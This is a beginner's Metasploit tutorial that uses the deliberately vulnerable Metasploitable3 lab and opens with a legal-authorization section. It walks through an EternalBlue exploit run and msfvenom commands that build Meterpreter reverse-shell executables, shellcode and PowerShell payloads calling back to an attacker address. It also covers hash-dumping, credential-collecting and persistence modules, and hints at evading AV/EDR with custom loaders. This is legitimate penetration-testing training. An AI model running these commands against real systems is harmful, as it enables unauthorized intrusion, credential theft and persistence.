Metasploit Framework Tutorial 2026: Ethical Penetration Testing for Beginners
Metasploit is the most widely used penetration testing framework in the world. It ships with over 2,300 exploits, 1,100 auxiliary modules, and hundreds of payloads — all accessible through a single, consistent interface. Whether you are studying for OSCP, preparing for a professional engagement, or just learning how real-world exploitation works, mastering the msfconsole tutorial workflow is a foundational skill. This guide covers everything from launching msfconsole to running post-exploitation modules, including metasploit kali linux setup, metasploit meterpreter sessions, and msfvenom tutorial payload generation — using only legal, deliberately vulnerable targets.
1. Legal and Ethical Foundation (MUST READ FIRST)
This section is not optional. Using Metasploit against systems you do not own or do not have written authorization to test is a serious crime in virtually every jurisdiction. Read this before running a single command.
The core rule
Only test systems you own or have explicit, written authorization to test. A verbal agreement is not authorization. A signed scope-of-work or rules-of-engagement document is the standard. When in doubt, get it in writing before you touch anything.
Laws that apply
- United States — Computer Fraud and Abuse Act (CFAA): Unauthorized access to a computer is a federal felony. First-time offenders have received multi-year prison sentences and six-figure fines. The CFAA is notoriously broad; "exceeding authorized access" has been prosecuted even against people who had an existing account on the target system.
- European Union — NIS2 and national cybercrime laws: Most EU member states have adopted laws modeled on the Budapest Convention on Cybercrime. Penalties are comparable to or exceed those in the U.S.
- United Kingdom — Computer Misuse Act 1990: Unauthorized access carries up to two years imprisonment for a basic offense and up to ten years for aggravated offenses involving critical infrastructure.
- Australia, Canada, and most others: Similar statutes exist. The principle is universal.
Your legal practice target: Metasploitable3
All examples in this metasploit tutorial use Metasploitable3, a deliberately vulnerable virtual machine maintained by Rapid7 (the company behind Metasploit). It is designed specifically to be attacked. Using it means you will never accidentally compromise a real system while following along.
Download and setup instructions: https://github.com/rapid7/metasploitable3
Run Metasploitable3 in an isolated host-only or NAT network in VirtualBox or VMware. Never expose it to the public internet — its vulnerabilities are intentional and complete.
2. Install and Update Metasploit on Kali Linux
Metasploit comes pre-installed on Kali Linux. Before your first session, initialize the database and launch the console:
sudo msfdb init && msfconsole
msfdb init creates a local PostgreSQL database that Metasploit uses to store hosts, services, vulnerabilities, and session data discovered during an engagement. This persistent storage is what makes Metasploit practical for multi-day assessments.
To update to the latest modules and fixes:
sudo apt update && sudo apt install metasploit-framework
Rapid7 pushes updates frequently. Run this before every engagement to ensure you have the most current exploit database.
Verify your version inside msfconsole:
msf6 > version
Framework: 6.x.x-dev
Console : 6.x.x-dev
3. msfconsole Basics
msfconsole is the primary interface to Metasploit. It is an interactive shell with tab completion, command history, and a module hierarchy organized by category.
search — find modules
msf6 > search ms17-010
msf6 > search type:exploit platform:windows smb
msf6 > search cve:2021-44228
The search command queries the local module database. You can filter by type (exploit, auxiliary, post, payload), platform, CVE, author, or any keyword. Results include a rank (Excellent, Great, Good, Normal, Average, Low) that reflects reliability.
use — select a module
msf6 > use exploit/windows/smb/ms17_010_eternalblue
After running use, your prompt changes to show the active module context. Everything you configure from this point applies to that module.
info — show module details
msf6 exploit(ms17_010_eternalblue) > info
info displays the module description, CVE references, author, reliability rating, and required options. Always read it before running an exploit — it tells you what the module does, what it requires, and any known limitations.
show options — required/optional settings
msf6 exploit(ms17_010_eternalblue) > show options
Lists every configurable parameter: whether it is required, its current value, and a short description. Required fields with no value set will cause run to fail with a clear error.
set RHOSTS — configure the target
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.56.10
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.56.1
RHOSTS accepts a single IP, a CIDR range (192.168.56.0/24), or a file of targets (file:/path/to/targets.txt). LHOST is your attacker machine's IP — the address the payload will call back to.
run / exploit
msf6 exploit(ms17_010_eternalblue) > run
run and exploit are synonymous. Use run -j to execute the module as a background job so you can keep using the console while it runs.
4. First Exploit: EternalBlue (MS17-010) on Metasploitable3
EternalBlue is the NSA-developed exploit leaked by Shadow Brokers in 2017. It targets a buffer overflow in Windows SMBv1 (CVE-2017-0144, also called MS17-010) and became infamous through WannaCry and NotPetya. On Metasploitable3 (Windows edition), it is intentionally left unpatched, making it the canonical first exploit for beginners in a metasploit kali linux lab.
Search and select the module
msf6 > search ms17-010
You will see several results. The one to use is:
exploit/windows/smb/ms17_010_eternalblue Excellent
Set options and run
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.56.10
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.56.1
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > run
Catch the shell
A successful run ends with:
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.10:49XXX)
meterpreter >
You now have a Meterpreter shell on the target running as NT AUTHORITY\SYSTEM. If the exploit fails, verify that SMBv1 is enabled on the Metasploitable3 instance and that no firewall is blocking port 445.
5. Meterpreter Sessions
Meterpreter is Metasploit's advanced post-exploitation payload. Unlike a raw shell, it runs entirely in memory, communicates over an encrypted channel, and provides a rich command set without writing files to disk.
sessions -l — list sessions
# Background the current session from inside Meterpreter:
meterpreter > background
# List all open sessions from msfconsole:
msf6 > sessions -l
Output shows the session ID, type, remote address, and the user context the payload is running as.
sessions -i 1 — interact with a session
msf6 > sessions -i 1
meterpreter >
Common Meterpreter commands
| Command | What it does |
|---|---|
sysinfo | OS name, hostname, architecture, Meterpreter architecture |
getuid | Current user context (e.g., NT AUTHORITY\SYSTEM) |
ps | List all running processes |
migrate <PID> | Move payload into another process for stability |
hashdump | Dump local SAM database NTLM password hashes |
screenshot | Capture the current desktop as a PNG |
upload <src> <dst> | Upload a file to the target |
download <src> <dst> | Download a file from the target |
shell — drop to OS shell
meterpreter > shell
Process 1234 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
C:\Windows\system32>whoami
nt authority\system
Press Ctrl+Z to background the shell channel and return to the Meterpreter prompt.
6. Payloads with msfvenom
msfvenom is Metasploit's standalone payload generator. It lets you create standalone executables, shellcode, scripts, and more for situations where you need to deliver a payload outside of a direct exploit. This section is the core of the msfvenom tutorial.
Generate a Windows reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.56.1 \
LPORT=4444 \
-f exe \
-o payload.exe
-pspecifies the payload.windows/x64/meterpreter/reverse_tcpis a staged payload — a small stager connects back to your listener and downloads the full Meterpreter stage.LHOSTandLPORTare the attacker's listening address and port.-f exeoutputs a Windows PE executable. Other formats includeelf,raw,python,powershell,dll, andjar.-o payload.exewrites the output to a file.
Other useful formats
# Linux ELF binary
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf -o shell.elf
# Raw shellcode in C array format
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f c
# PowerShell one-liner
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f psh-cmd
Set up the listener with exploit/multi/handler
Before delivering the payload, start a handler to catch the incoming connection:
msf6 > use exploit/multi/handler
msf6 exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(handler) > set LHOST 192.168.56.1
msf6 exploit(handler) > set LPORT 4444
msf6 exploit(handler) > run -j
run -j starts the handler as a background job. When the payload executes on the target, Metasploit prints a session notification and you can interact with it using sessions -i <id>.
7. Post-Exploitation Modules
Once you have a Meterpreter session, Metasploit's post modules automate common post-exploitation tasks. They run against an existing session rather than launching a new exploit.
run post/multi/recon/local_exploit_suggester
meterpreter > run post/multi/recon/local_exploit_suggester
This module checks the target for known local privilege escalation vulnerabilities and lists applicable exploits from the Metasploit database. It is one of the first modules to run after gaining initial access.
run post/windows/gather/hashdump
meterpreter > run post/windows/gather/hashdump
Dumps the Windows SAM database NTLM hashes. Requires SYSTEM-level privileges. The hashes can be fed directly into hashcat for offline cracking — see our Hashcat tutorial for the next steps.
Other useful post modules
# Enumerate installed applications
run post/windows/gather/enum_applications
# Dump saved browser and application credentials
run post/windows/gather/credentials/credential_collector
# Enumerate network shares
run post/windows/gather/enum_shares
# Enumerate environment variables
run post/multi/gather/env
Run search type:post in msfconsole to browse the full list. There are over 300 post-exploitation modules covering everything from persistence mechanisms to Active Directory enumeration.
8. Metasploit vs. Manual Exploitation
Metasploit is a productivity tool, not a replacement for understanding what is actually happening on the wire. Knowing when to use it — and when not to — separates effective penetration testers from script kiddies.
Use Metasploit when:
- The target matches a known CVE with a reliable module (Excellent or Great rank).
- You need to move quickly through a large scope and document findings reproducibly.
- You want Meterpreter's feature-rich post-exploitation environment — it takes months to replicate manually with custom tooling.
- The engagement authorizes it and speed matters more than stealth.
Write custom exploits when:
- No public module exists for the vulnerability.
- The Metasploit module fails because of minor version differences or non-standard configurations.
- You are targeting a zero-day or a proprietary protocol.
- AV/EDR detects and blocks Metasploit's well-known payloads. Out-of-the-box Metasploit signatures are widely detected by modern endpoint protection. Custom shellcode and loaders are required in mature environments.
- You need to deeply understand the vulnerability — for a CVE submission, a research report, or OSCP exam machines where Metasploit is restricted to a single use.
In professional engagements, a realistic workflow is: use Metasploit to quickly confirm exploitability and get initial access, then pivot to custom tooling for stealth and lateral movement if the environment has active detection capabilities.
9. FAQ
Q: Is Metasploit legal to use? Yes — on systems you own or are authorized to test. The framework itself is legal open-source software. The legality depends entirely on what you point it at.
Q: Does Metasploit work on modern, patched Windows 11 systems? EternalBlue and many classic exploits do not — they rely on unpatched vulnerabilities. Modern assessments focus on misconfigurations, weak credentials, and application-layer issues. Metasploit has extensive auxiliary and post-exploitation modules for these scenarios.
Q: What is the difference between a staged and a stageless payload? A staged payload (e.g., windows/x64/meterpreter/reverse_tcp) uses a small first-stage stager that connects back and downloads the full Meterpreter stage from the handler. A stageless payload (e.g., windows/x64/meterpreter_reverse_tcp) embeds everything in the generated binary. Stageless payloads are larger but work in environments where a second inbound connection from the handler would be blocked.
Q: msfvenom says "No platform was selected, choosing Msf::Module::Platform::Windows." Is that a problem? No. It is Metasploit inferring the platform from the payload selection and confirming its assumption. The payload generates correctly.
Q: How do I persist a Meterpreter session across a reboot? Use run post/windows/manage/persistence_exe or run post/linux/manage/cron_persistence depending on the target OS. Persistence mechanisms are highly detectable and should only be used in scoped engagements where persistence is explicitly part of the authorized test plan. Remove all artifacts when the engagement ends.
Q: What is the difference between Metasploit Framework and Metasploit Pro? Metasploit Framework is open source (MIT license) and is what ships on Kali Linux. Metasploit Pro is a commercial product from Rapid7 that adds a web GUI, automated reporting, phishing campaign management, and enterprise workflow features. For learning and most professional use, the free Framework is sufficient.
Q: What certifications use Metasploit? OSCP (Offensive Security Certified Professional) permits Metasploit for one machine during the exam. eJPT (eLearnSecurity Junior Penetration Tester) and PNPT (Practical Network Penetration Tester) both cover Metasploit extensively in their curricula.
Next Steps
- Work through the full Metasploitable3 challenge — it has 20+ intentional vulnerabilities across SMB, web apps, databases, and services. Each one gives you practice with a different module type.
- Study the Offensive Security PEN-200 curriculum if you are targeting OSCP. OSCP restricts Metasploit to one machine per exam, so building manual exploitation skills alongside Metasploit knowledge is essential.
- Pair Metasploit with Nmap — see our Nmap tutorial for reconnaissance techniques. Feed scan results directly into Metasploit's database using
db_nmap. - After dumping hashes with
hashdump, head to our Hashcat tutorial to learn offline password cracking. - Read Metasploit Unleashed — Offensive Security's free, comprehensive Metasploit course — once you are comfortable with the basics covered here.